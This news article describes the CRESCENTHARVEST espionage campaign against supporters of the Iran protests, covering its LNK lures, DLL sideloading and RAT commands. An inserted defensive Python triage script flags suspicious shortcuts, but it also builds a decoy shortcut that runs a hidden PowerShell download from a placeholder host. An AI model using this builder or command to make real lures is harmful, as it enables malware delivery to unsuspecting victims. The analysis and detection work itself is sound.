CRESCENTHARVEST Campaign Targets Iran Protest Supporters With RAT Malware

Published: February 19, 2026 at 03:13 AM EST

Source: The Hacker News

Ravie Lakshmanan
Feb 19, 2026 | Cyber Espionage / Data Security


Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran’s ongoing protests to conduct information theft and long‑term espionage.

The Acronis Threat Research Unit (TRU) said it observed the activity after January 9, 2026. The attacks deliver a payload that combines a remote‑access trojan (RAT) and information stealer: it executes commands, logs keystrokes, and exfiltrates sensitive data. It is currently not known whether any of the attacks succeeded.

“The campaign exploits recent geopolitical developments to lure victims into opening malicious .LNK files disguised as protest‑related images or videos,” researchers Subhajeet Singha, Eliad Kimhy, and Darrel Virtusio said in a report published this week.
“These files are bundled with authentic media and a Farsi‑language report providing updates from ‘the rebellious cities of Iran.’ This pro‑protest framing appears to be intended to increase credibility and to attract Farsi‑speaking Iranians seeking protest‑related information.”


CRESCENTHARVEST, although unattributed, is believed to be the work of an Iran‑aligned threat group. The discovery makes it the second such campaign identified as going after specific individuals in the aftermath of the nationwide protests in Iran that began toward the end of 2025.

Last month, French cybersecurity company HarfangLab detailed a threat cluster dubbed RedKitten that targeted non‑governmental organizations and individuals documenting recent human‑rights abuses in Iran, aiming to infect them with a custom backdoor known as SloppyMIO.

According to Acronis, the exact initial‑access vector used to distribute the malware is not known. However, it is suspected that the threat actors rely on spear‑phishing or “protracted social‑engineering efforts,” in which operators build rapport with victims over time before sending the malicious payloads.

It is worth noting that Iranian hacking groups such as Charming Kitten and Tortoiseshell have a long history of sophisticated social‑engineering attacks that involve:

  • Approaching prospective targets under fake personas.
  • Cultivating relationships that can stretch for years.
  • Weaponising that trust to deliver malware.

“The use of Farsi language content for social engineering and the distributed files depicting the protests in heroic terms suggest an intent to attract Farsi‑speaking individuals of Iranian origin, who are in support of the ongoing protests,” the Swiss‑based security company noted.

Attack chain

  1. Malicious RAR archive – Claims to contain information related to the Iranian protests (images, videos) and includes two Windows shortcut (.lnk) files that masquerade as an image or video using the double‑extension trick (*.jpg.lnk or *.mp4.lnk). The trick works because Explorer never displays the .lnk suffix of a shortcut, regardless of the "Hide extensions for known file types" setting, so the file is listed as a plain .jpg or .mp4 and can carry the icon of a real picture.

  2. Execution – Launching the shortcut runs the PowerShell command line embedded in it: the script downloads a second‑stage ZIP archive and, at the same time, opens a benign image or video, so the victim sees what the file name promised and has no reason to suspect anything.

  3. ZIP payload – Contains a legitimate Google‑signed binary (software_reporter_tool.exe, part of Chrome’s cleanup utility) and several DLLs, including two rogue libraries that are sideloaded by the executable:

    • urtcbased140d_d.dll – A C++ implant that extracts and decrypts Chrome’s app‑bound encryption keys via COM interfaces; it overlaps with the open‑source project ChromElevator.
    • version.dll (aka CRESCENTHARVEST) – A remote‑access tool that:
      • Lists installed antivirus products and security tools.
      • Enumerates local user accounts.
      • Loads additional DLLs.
      • Harvests system metadata, browser credentials, Telegram Desktop account data, and keystrokes.
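As an added illustration of the first two steps (this is not code from the Acronis report or from the campaign), the following Python triages a shortcut the way a responder would before anyone double‑clicks it: it parses the MS‑SHLLINK header and string data, then flags a double extension, a command line that invokes a script host or downloader, and a window that starts minimized. The sample shortcut, its file name, the hostname example.invalid and its one‑liner are all constructed for this example and do not come from the campaign.

```python
"""Static triage of a Windows shortcut (.lnk, MS-SHLLINK) without running it."""
import re
import struct

# {00021401-0000-0000-C000-000000000046}, the ShellLink class ID, as stored on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_DATA = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location")]  # LinkFlags bit -> field
SHOW = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
MEDIA_EXT = re.compile(r"\.(jpe?g|png|gif|mp4|avi|mov|pdf|docx?)$", re.I)
SCRIPT_HOST = re.compile(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|"
                         r"-enc|iwr|invoke-webrequest|downloadstring|https?://", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the header ShowCommand and the StringData fields of a ShellLink."""
    if (len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C                                    # end of the 76-byte header
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"show_command": SHOW.get(show, "SW_SHOWNORMAL")}
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    for bit, name in STRING_DATA:                 # each: CountCharacters + chars
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            fields[name] = data[pos:pos + count * width].decode(codec, "replace")
            pos += count * width
    return fields


def triage_lnk(filename: str, data: bytes) -> tuple:
    """Parse the shortcut and return (fields, findings) for the analyst."""
    fields, findings = parse_lnk(data), []
    if filename.lower().endswith(".lnk") and MEDIA_EXT.search(filename[:-4]):
        findings.append("double extension: named like media but is a shortcut")
    cmdline = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    if SCRIPT_HOST.search(cmdline):
        findings.append("target runs a script host / downloader: " + cmdline.strip())
    if fields["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("window starts minimized, hiding the console from the victim")
    return fields, findings


def build_lnk(rel_path: str, working_dir: str, arguments: str, icon: str,
              show: int = 7) -> bytes:
    """Assemble a minimal Unicode ShellLink (constructed test input, not a real sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | IS_UNICODE | 0x08 | 0x10 | 0x20 | 0x40
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show, 0, 0, 0, 0)
    id_list = b"\x04\x00\x1f\x50" + b"\x00\x00"          # one dummy ItemID + TerminalID
    id_list = struct.pack("<H", len(id_list)) + id_list
    link_info = struct.pack("<7I", 28, 28, 0, 0, 0, 0, 0)  # empty LinkInfo, size 28
    body = b"".join(struct.pack("<H", len(s.encode("utf-16-le")) // 2) + s.encode("utf-16-le")
                    for s in (rel_path, working_dir, arguments, icon))
    return header + id_list + link_info + body


SAMPLE_NAME = "protest_tehran.jpg.lnk"   # hypothetical decoy name


def sample_lnk() -> bytes:
    """Decoy that looks like a photo but launches PowerShell (hypothetical command line)."""
    return build_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "%TEMP%",
        '-w hidden -nop -c "iwr http://example.invalid/a.zip -OutFile a.zip; start decoy.jpg"',
        r"%SystemRoot%\System32\imageres.dll", show=7)


if __name__ == "__main__":
    info, notes = triage_lnk(SAMPLE_NAME, sample_lnk())
    for key, value in info.items():
        print(f"{key:14} {value}")
    for note in notes:
        print("!", note)
```

Run against a real shortcut with `triage_lnk(path.name, open(path, "rb").read())`; a benign shortcut to notepad.exe produces an empty findings list, while the constructed decoy trips all three checks. Because the parser never resolves the target or touches the shell, it is safe to run inside an analysis VM on files straight out of the archive.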


CRESCENTHARVEST employs Windows WinHTTP APIs to communicate with its command‑and‑control (C2) infrastructure, completing the espionage loop.

Command‑and‑Control (C2) Server
servicelog-information[.]com – a domain name chosen to look like routine service telemetry so that C2 traffic blends in with regular network activity.

Supported Commands

  • Anti – run anti‑analysis checks
  • His – steal browser history
  • Dir – list directories
  • Cwd – get the current working directory
  • Cd – change directory
  • GetUser – retrieve user information
  • ps – execute PowerShell commands (currently not working)
  • KeyLog – activate keylogger
  • Tel_s – steal Telegram session data
  • Cook – steal browser cookies
  • Info – collect system information
  • F_log – steal browser credentials
  • Upload – upload files
  • shell – run shell commands

“The CRESCENTHARVEST campaign represents the latest chapter in a decade‑long pattern of suspected nation‑state cyber‑espionage operations targeting journalists, activists, researchers, and diaspora communities globally,” Acronis said. “Much of what we observed in CRESCENTHARVEST reflects well‑established tradecraft: LNK‑based initial access, DLL side‑loading through signed binaries, credential harvesting and social engineering aligned to current events.”

